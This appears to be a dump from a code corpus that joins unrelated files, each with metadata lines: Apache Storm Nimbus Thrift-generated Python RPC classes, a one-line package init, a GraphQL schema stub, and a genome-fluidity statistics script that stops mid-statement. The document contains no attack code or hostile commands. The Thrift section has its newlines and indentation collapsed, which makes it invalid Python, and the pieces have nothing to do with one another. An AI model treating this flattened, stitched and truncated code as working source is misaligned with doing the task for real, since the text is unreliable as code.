read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.id = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('downloadChunk_args') if self.id is not None: oprot.writeFieldBegin('id', TType.STRING, 1) oprot.writeString(self.id) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class downloadChunk_result: """ Attributes: - success """ thrift_spec = ( (0, TType.STRING, 'success', None, None, ), # 0 ) def __init__(self, success=None,): self.success = success def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRING: self.success = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('downloadChunk_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRING, 0) oprot.writeString(self.success) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getNimbusConf_args: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getNimbusConf_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getNimbusConf_result: """ Attributes: - success """ thrift_spec = ( (0, TType.STRING, 'success', None, None, ), # 0 ) def __init__(self, success=None,): self.success = success def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRING: self.success = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getNimbusConf_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRING, 0) oprot.writeString(self.success) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getClusterInfo_args: thrift_spec = ( ) def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getClusterInfo_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getClusterInfo_result: """ Attributes: - success """ thrift_spec = ( (0, TType.STRUCT, 'success', (ClusterSummary, ClusterSummary.thrift_spec), None, ), # 0 ) def __init__(self, success=None,): self.success = success def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = ClusterSummary() self.success.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getClusterInfo_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getTopologyInfo_args: """ Attributes: - id """ thrift_spec = ( None, # 0 (1, TType.STRING, 'id', None, None, ), # 1 ) def __init__(self, id=None,): self.id = id def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.id = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getTopologyInfo_args') if self.id is not None: oprot.writeFieldBegin('id', TType.STRING, 1) oprot.writeString(self.id) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getTopologyInfo_result: """ Attributes: - success - e """ thrift_spec = ( (0, TType.STRUCT, 'success', (TopologyInfo, TopologyInfo.thrift_spec), None, ), # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, success=None, e=None,): self.success = success self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = TopologyInfo() self.success.read(iprot) else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getTopologyInfo_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getTopologyConf_args: """ Attributes: - id """ thrift_spec = ( None, # 0 (1, TType.STRING, 'id', None, None, ), # 1 ) def __init__(self, id=None,): self.id = id def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.id = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getTopologyConf_args') if self.id is not None: oprot.writeFieldBegin('id', TType.STRING, 1) oprot.writeString(self.id) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getTopologyConf_result: """ Attributes: - success - e """ thrift_spec = ( (0, TType.STRING, 'success', None, None, ), # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, success=None, e=None,): self.success = success self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRING: self.success = iprot.readString(); else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getTopologyConf_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRING, 0) oprot.writeString(self.success) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getTopology_args: """ Attributes: - id """ thrift_spec = ( None, # 0 (1, TType.STRING, 'id', None, None, ), # 1 ) def __init__(self, id=None,): self.id = id def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.id = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getTopology_args') if self.id is not None: oprot.writeFieldBegin('id', TType.STRING, 1) oprot.writeString(self.id) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getTopology_result: """ Attributes: - success - e """ thrift_spec = ( (0, TType.STRUCT, 'success', (StormTopology, StormTopology.thrift_spec), None, ), # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, success=None, e=None,): self.success = success self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = StormTopology() self.success.read(iprot) else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getTopology_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getUserTopology_args: """ Attributes: - id """ thrift_spec = ( None, # 0 (1, TType.STRING, 'id', None, None, ), # 1 ) def __init__(self, id=None,): self.id = id def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.id = iprot.readString(); else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getUserTopology_args') if self.id is not None: oprot.writeFieldBegin('id', TType.STRING, 1) oprot.writeString(self.id) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getUserTopology_result: """ Attributes: - success - e """ thrift_spec = ( (0, TType.STRUCT, 'success', (StormTopology, StormTopology.thrift_spec), None, ), # 0 (1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1 ) def __init__(self, success=None, e=None,): self.success = success self.e = e def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.STRUCT: self.success = StormTopology() self.success.read(iprot) else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = NotAliveException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('getUserTopology_result') if self.success is not None: oprot.writeFieldBegin('success', TType.STRUCT, 0) self.success.write(oprot) oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other)
2
2
gemucator/__init__.py
philipwfowler/genucator
0
5511
#! /usr/bin/env python from .core import gemucator
1.015625
1
client/checkout/schema/types.py
daniel-waruo/e-commerse-api
6
5512
<gh_stars>1-10 import graphene from graphene_django import DjangoObjectType from graphene_django.converter import convert_django_field from pyuploadcare.dj.models import ImageField
1.15625
1
pangenome_fluidity.py
PlantDr430/CSU_scripts
1
5513
#!/usr/bin/python3 ''' This script follows formulas put forth in Kislyuk et al. (2011) to calculate genome fluidity of a pangenome dataset. Variance and standard error are estimated as total variance containing both the variance due to subsampling all possible combinations (without replacement) of N genomes from the total pool of genomes and the variance due to the limited number of sampled genomes (variance of the pangenome)(Kislyuk et al. 2011). However, the script has a default max number of subsamples set to 250,000 for each N genomes. This can be altered with the -max_sub / --max_subsamples flag or turned off with the --max_off flag. Turning the max_off will force calculations to be done on all possible subsample combinations of N genomes. For samples of N genomes that were stopped at the max number of subsamples the subsamples are sampled WITH replacement and variance is calculated with a degree of freedom = 1 (i.e. n - 1). Results are a text file of fluidity, variance, and standard error for all N genome samples and a figure of pangenome fluidity with shaded regions showing total standard error with a exponential regression fit. Notes 1. This will only work if you have at least 5 isolates to make up your pangenome. 2. If you have 5 isolates your graph will probably not look pretty as it's difficult to fit with such a low number of samples. ''' import os, sys, re, argparse, random, itertools, scipy, warnings, subprocess import numpy as np import pandas as pd import matplotlib.pyplot as plt from multiprocessing import Pool from itertools import combinations from collections import OrderedDict from collections.abc import Iterable from scipy.optimize import curve_fit, differential_evolution rundir = os.getcwd() class MyFormatter(argparse.RawTextHelpFormatter): def __init__(self, prog): super(MyFormatter, self).__init__(prog, max_help_position=48) parser = argparse.ArgumentParser( usage='./%(prog)s [options] -i orthogroups -o output_folder', description = ''' Performs multiple bootstraps and calculates genome fluidity from a pangenome dataset (orthogroups).''', epilog = """Written by <NAME> (2019)""", formatter_class = MyFormatter) parser.add_argument( '-i', '--input', required = True, help = 'Orthogroups file, see format in READ.me', metavar='' ) parser.add_argument( '-o', '--out', required = True, help = 'Output folder', metavar='' ) parser.add_argument( '-c', '--cpus', type=int, default=1, help = 'Number of cores to use for multiprocessing [default: 1]', metavar='' ) parser.add_argument( '-max_sub', '--max_subsamples', type=int, default=250000, help = 'Max number of subsamples to run on N genomes sampled. [default: 250000]', metavar='' ) parser.add_argument( '--max_off', action='store_true', help = 'Turn off the max subsamples. This will cause the script sample ALL possible combinations'\ 'for N genomes', ) parser.add_argument( '-p', '--prefix', help = 'Prefix to append to the result files (such as Genus, species, etc.)', metavar='' ) args=parser.parse_args() if not os.path.isdir(args.out): os.makedirs(os.path.join(args.out)) result_dir = os.path.abspath(os.path.join(rundir, args.out)) if args.input: input_file = os.path.abspath(args.input) else: print('ERROR: No orthogroups file was provided please provide on, -i or --input') sys.exit() if args.prefix: fluid_results = os.path.abspath(os.path.join(result_dir, args.prefix+'_fluidity.txt')) fluid_fig = os.path.abspath(os.path.join(result_dir, args.prefix+'_fluidity.png')) else: fluid_results = os.path.abspath(os.path.join(result_dir, 'Pangenome_fluidity.txt')) fluid_fig = os.path.abspath(os.path.join(result_dir, 'Pangenome_fluidity.png')) def create_ortho_dictionary(ortho_file): # create dictionary of gene clusters and isolates per cluster '''Genereate dictionary of Orthogroups.''' print('Creating ortholog dictionary') ortho_isolates_dict = OrderedDict() # {Protein Cluster : list of isolates represented in cluster} with open(ortho_file, 'r') as infile: ortho_list = [item.strip() for item in sorted(infile)] for line in ortho_list: iso_list = [] if ':' in line: cluster, genes = line.split(':') elif '\t' in line: cluster, genes = line.split('\t', 1) else: cluster, genes = line.split(' ', 1) for match in re.finditer(r'([^\s]+)', genes): isolate = match.group(0).split('_')[0] iso_list.append(isolate) ortho_isolates_dict[cluster] = list(set(iso_list)) return ortho_isolates_dict def create_pair_dictionary(ortho_dictionary): '''Create all possible unique pairs of isolates and get their unique sum gene clusters.''' print('Creating dictionary of paired ratio values') pair_dict = {} # {(Isolate1, Isolate2) : [ratio of sum(unique clusters)/sum(all clusters)]} for i in range(0, len(iso_list)): for x in range(0, len(iso_list)): if not iso_list[i] == iso_list[x]: pair = tuple(sorted([iso_list[i], iso_list[x]])) if not pair in pair_dict.keys(): cogs = {'Shared' : 0, 'Uk' : 0, 'Ul' : 0} for k,v in ortho_dictionary.items(): if pair[0] in v and pair[1] in v: cogs['Shared'] += 1 elif pair[0] in v and pair[1] not in v: cogs['Uk'] += 1 elif pair[0] not in v and pair[1] in v: cogs['Ul'] += 1 else: pass # don't need to count a cluster if both isolates are not present unique_pair = cogs['Uk'] + cogs['Ul'] all_pair = (cogs['Uk'] + cogs['Shared']) + (cogs['Ul'] + cogs['Shared']) pair_dict[pair] = unique_pair/all_pair return pair_dict def compute_fluidity_all_genomes(): ''' Computes the fluidity and variance for the pangenome in question from the max number of genomes in the pangenome. ''' N = iso_num fluidity_list = [ratio for ratio in pair_dict.values()] # list of ratios pangenome_fluidity = (2/(N*(N-1)))*sum(fluidity_list) # get fluidity from average of all ratios jack_samples = list(combinations(iso_list, N - 1)) # get list of all combos of N-1 from max num of genomes fluidity_i_list = [] for sample in jack_samples: jack_pairs = tuple(combinations(sample,2)) # get all pairs from current jackknife sample jack_sample_fluidity = [pair_dict[tuple(sorted(p))] for p in jack_pairs] # get ratios from pair_dict fluidity_i = (2/((N-1)*(N-2)))*sum(jack_sample_fluidity) # calculate fluidity_i fluidity_i_list.append(fluidity_i) fluidity_i_mean = np.mean(fluidity_i_list) # calculate fluidity_i_mean from all fluidity_i's fluidity_variance = ((N-1)/N)*sum([(i-fluidity_i_mean)**2 for i in fluidity_i_list]) # calculate variance return pangenome_fluidity, fluidity_variance def subsample_multiprocess(combo_list): ''' Takes portions of the full combo_list and runs them on separate threads for faster processing. Calcualtes fluidity for each sample and returns list of fluidities. ''' N = len(combo_list[0]) # get N from number of genomes present sample_process_list = [] for sample in combo_list: pairs = tuple(combinations(sample,2)) pair_fluidity_list = [pair_dict[tuple(sorted(p))] for p in pairs] sample_fluidity = (2/(N*(N-1)))*sum(pair_fluidity_list) sample_process_list.append(sample_fluidity) return sample_process_list def genome_subsamples_fluidities(perm_list): ''' Compute fluidities from all possible combinations of genomes from 3 to N randomly sampled genomes (N is the max number of gneomes in sample, so only sampled once). Has a cut off of max subsamples at which point variances are calcualted as sample variances (n-1) instead of full population variances. ''' sub_fluid_dict = {} # {N genomes sampled : [list of fluidities from subsamples]} for N in range(3, iso_num + 1): sub_fluid_dict[N] = [] N_combos = list(combinations(iso_list, N)) if args.max_off: combos = N_combos else: if len(N_combos) > args.max_subsamples: combos = random.choices(N_combos, k=args.max_subsamples) perm_list.append(N) else: combos = N_combos print('Performing fluidity calculations on {} subsample combinations of {} genomes'.format(len(combos),N)) if not len(N_combos) == 1: chunk = round(len(combos)/args.cpus) split_combos = [combos[i:i + chunk] for i in range(0, len(combos), chunk)] pool = Pool(processes=args.cpus) results = pool.imap(subsample_multiprocess, split_combos) pool.close() pool.join() sub_fluid_dict[N].append(results) else: last_run = subsample_multiprocess(N_combos) sub_fluid_dict[N].append(last_run) sub_fluid_dict[N]=list(flatten(sub_fluid_dict[N])) print(len(sub_fluid_dict[N])) return sub_fluid_dict def flatten(lis): for item in lis: if isinstance(item, Iterable) and not isinstance(item, str): for x in flatten(item): yield x else: yield item def exponential(x, a, b, c): return a * np.exp(b * x) + c def neg_exponential(x, a, b, c): return a * np.exp(-b * x) + c def sumOfSquaredError(parameterTuple, x_values, y_curve_values, func): warnings.filterwarnings("ignore") # do not print warnings by genetic algorithm val = func(x_values, *parameterTuple) return np.sum((y_curve_values - val) ** 2.0) def generate_Initial_Parameters(x_values, y_curve_values, func): # min and max used for bounds maxX = max(x_values) minX = min(x_values) maxY = max(y_curve_values) minY = min(y_curve_values) maxXY = max(maxX, maxY) parameterBounds = [] parameterBounds.append([-maxXY, maxXY]) # seach bounds for a parameterBounds.append([-maxXY, maxXY]) # seach bounds for b parameterBounds.append([-maxXY, maxXY]) # seach bounds for c # "seed" the numpy random number generator for repeatable results result = differential_evolution(sumOfSquaredError, parameterBounds, args=(x_values,y_curve_values, func), seed=3) return result.x def create_fluidity_results(figure_output, results_output): total_variance = [] for i in range(3, iso_num + 1): if i in permutation_list: total_variance.append(np.var(sub_fluid_dict[i], ddof = 1) + pan_variance) else: total_variance.append(np.var(sub_fluid_dict[i]) + pan_variance) total_variance = np.array(total_variance) total_stderr = np.array([x**(1/2) for x in total_variance]) y_fluidity_values = np.array([pan_fluidity for i in range(3, iso_num + 1)]) x_labels = np.array([i for i in range(3, iso_num + 1)]) stderr_bottom = np.array([(pan_fluidity - v) for v in total_stderr]) stderr_top = np.array([(pan_fluidity + v) for v in total_stderr]) fig, ax = plt.subplots() try: # Still had problems sometimes with fitting curves, this solution works best for now geneticParameters_top = generate_Initial_Parameters(x_labels, stderr_top, exponential) geneticParameters_bottom = generate_Initial_Parameters(x_labels, stderr_bottom, exponential) popt_t, pcov = curve_fit(exponential, x_labels, stderr_top, geneticParameters_top, maxfev=10000) popt_b, pcov = curve_fit(exponential, x_labels, stderr_bottom, geneticParameters_bottom, maxfev=10000) if len(set(exponential(x_labels, *popt_t))) > 3 and len(set(exponential(x_labels, *popt_b))) > 3: plt.fill_between(x_labels, exponential(x_labels, *popt_t), exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6) top_curve = exponential(x_labels, *popt_t) bottom_curve = exponential(x_labels, *popt_b) if len(set(exponential(x_labels, *popt_t))) <= 3: geneticParameters_top = generate_Initial_Parameters(x_labels, stderr_top, neg_exponential) popt_t, pcov = curve_fit(neg_exponential, x_labels, stderr_top, geneticParameters_top, maxfev=10000) plt.fill_between(x_labels, neg_exponential(x_labels, *popt_t), exponential(x_labels, *popt_b), facecolor='blue', alpha=0.6) top_curve = neg_exponential(x_labels, *popt_t) bottom_curve = exponential(x_labels, *popt_b) else: pass if len(set(exponential(x_labels, *popt_b))) <= 3: geneticParameters_bottom = 